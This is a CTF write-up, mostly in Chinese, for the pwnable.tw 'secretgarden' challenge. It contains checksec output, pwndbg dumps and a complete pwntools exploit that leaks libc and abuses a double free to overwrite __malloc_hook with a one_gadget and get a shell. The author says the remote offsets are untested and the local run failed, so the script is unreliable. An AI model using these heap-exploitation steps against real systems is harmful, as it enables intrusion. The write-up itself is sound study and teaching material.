
secretgarden

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled
FORTIFY:  Enabled

(保护全开好可怕55

菜单

☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ 
☆ Secret Garden ☆
☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆

1 . Raise a flower
2 . Visit the garden
3 . Remove a flower from the garden
4 . Clean the garden
5 . Leave the garden

remove 释放后没有把指针置零,存在 double free 漏洞

  1. 申请unsorted bin泄露libc
  2. double free修改fd到__malloc_hook等,改malloc为one_gadget,不过这里,one的条件都不符合,所以需要触发malloc_printerr
[+] malloc_addr = 0x7f4f71258c30
pwndbg> x/10gx 0x7f4f71258c00
0x7f4f71258c00 <_IO_wide_data_0+288>: 0x0000000000000000 0x0000000000000000
0x7f4f71258c10 <_IO_wide_data_0+304>: 0x00007f4f71254d60 0x0000000000000000
0x7f4f71258c20 <__memalign_hook>: 0x00007f4f70f04480 0x00007f4f70f05800
0x7f4f71258c30 <__malloc_hook>: 0x0000000000000000 0x0000000000000000
0x7f4f71258c40 <main_arena>: 0x0000000000000000 0x0000000000000000
pwndbg> x/10gx 0x7f4f71258c30-0x23
0x7f4f71258c0d <_IO_wide_data_0+301>: 0x4f71254d60000000 0x000000000000007f -------> fake chunk
0x7f4f71258c1d: 0x4f70f04480000000 0x4f70f0580000007f
0x7f4f71258c2d <__realloc_hook+5>: 0x000000000000007f 0x0000000000000000
0x7f4f71258c3d: 0x0000000000000000 0x0000000000000000
0x7f4f71258c4d <main_arena+13>: 0x0000000000000000 0x0000000000000000

exp

本地泄露是libc基址,但是远程,偏移就不对了,我也不知道怎么测555。而且本地double free并不能成功,但是感觉没毛病

#!usr/bin/python
from pwn import *
# Trace every send/recv on the tube; the writeup's output was captured with this on.
context.log_level = 'debug'

# Challenge binary plus the remote endpoint used when pwn() is not in debug mode.
binary, ip, port = "./secretgarden", "chall.pwnable.tw", 10203
elf = ELF(binary)

def menu(choice):
    """Answer the garden's ``choice : `` prompt with *choice*.

    ``io`` is the module-global tube that ``pwn`` opens; it is not passed in.
    """
    selection = str(choice)
    io.sendlineafter("choice : ", selection)

def sraise(length, name, color):
    """Menu option 1 ("Raise a flower"): request *length* bytes, then fill in
    the flower's *name* and *color*.

    The name is sent raw with ``sendafter`` (no trailing newline) so that
    exactly *name* lands in the buffer; the other two answers are lines.
    """
    tube = io
    menu(1)
    tube.sendlineafter("name :", str(length))
    tube.sendafter("name of flower :", name)
    tube.sendlineafter("the flower :", color)

def svisit():
    """Menu option 2 ("Visit the garden"): print the current flowers."""
    menu(2)

def sremove(idx):
    """Menu option 3 ("Remove a flower"): free the flower at index *idx*.

    Per the writeup, the program does not clear the pointer afterwards, so
    the same index can be removed again.
    """
    menu(3)
    index_text = str(idx)
    io.sendlineafter("garden:", index_text)

def sclean():
    """Menu option 4 ("Clean the garden"); defined for completeness, unused by pwn()."""
    menu(4)


def pwn(ip, port, debug):
    """Run the writeup's exploit against the local binary (``debug == 1``) or
    the remote service at *ip*:*port*.

    Sets the module-global ``io`` tube used by ``menu``/``sraise``/``sremove``/
    ``svisit``.  The ``one`` gadget offsets and ``main_arena_offset`` are
    hard-coded per libc build: the local system libc in debug mode, the
    provided ``libc_64.so.6`` otherwise (the writeup notes the remote offsets
    were not confirmed).
    """
    global io
    if debug == 1:
        io = process(binary)
        libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
        one = [0x4f365, 0x4f3c2, 0x10a45c]
        main_arena_offset = 0x3ebc40
    else:
        io = remote(ip, port)
        libc = ELF("libc_64.so.6")
        one = [0x45216, 0x4526a, 0xef6c4, 0xf0567]
        main_arena_offset = 0x3c3b20

    # NOTE(review): the label says main_arena_offset, but the value printed is
    # __malloc_hook + 0x10 (main_arena, per the gdb dump above) taken from the
    # libc symbol table, not the hard-coded main_arena_offset chosen above.
    success("main_arena_offset = "+hex(libc.sym['__malloc_hook']+0x10))
    # Writeup step 1: three flowers, free #0 and #1 so the 0x500 chunk lands in
    # the unsorted bin, then reuse part of it (#3) and read it back.
    sraise(0x30, "a"*8, "y") # 0
    sraise(0x500, "a"*16, "y") # 1
    sraise(0x30, "a"*8, "y") # 2
    sremove(0)
    sremove(1)
    sraise(0x400, "b"*8, "y") # 3
    # gdb.attach(io)
    svisit()
    io.recvuntil("b"*8)
    # Python 2 pwntools: recv() returns str, so a str pad for ljust is fine.
    # NOTE(review): under Python 3 the pad would have to be b'\x00'.
    libc_base = u64(io.recv(6).ljust(8, '\x00')) - 0x480 - main_arena_offset
    malloc_addr = libc_base + libc.sym['__malloc_hook']
    # `one` is rebound here from the gadget list to a single absolute address
    # (index 2 in both lists).
    one = libc_base + one[2]
    success("libc_base = "+hex(libc_base))
    success("malloc_addr = "+hex(malloc_addr))
    success("one_addr = "+hex(one))

    # Writeup step 2: double free of #4 (4, 5, 4), then the reallocated #6 gets
    # the fake-chunk address shown in the gdb dump (__malloc_hook - 0x23).
    sraise(0x68, "c"*8, "y") # 4
    sraise(0x68, "c"*8, "y") # 5
    sremove(4)
    sremove(5)
    sremove(4)
    sraise(0x68, p64(malloc_addr-0x23), "y") # 6

    # #7 and #8 drain the two real chunks; #9 is the fake chunk, 0x13 bytes of
    # padding then the one-gadget address.
    sraise(0x68, "d"*8, "y") # 7
    sraise(0x68, "d"*8, "y") # 8
    sraise(0x68, "e"*0x13+p64(one), "y") # 9

    gdb.attach(io)

    # io.sendlineafter("choice : ", "1")

    # Deliberate repeated free of #8: the writeup says the gadget constraints
    # are not met on a plain malloc, so malloc_printerr has to be triggered.
    sremove(8)
    sremove(8)

    io.interactive()

if __name__ == '__main__':
    # Local debug run (debug flag 1) against ./secretgarden; ip/port are ignored then.
    pwn(ip, port, debug=1)

https://blog.ivan0.com/2018/11/18/pwnable-tw-secretgarden/

这个给了两种解法,挺好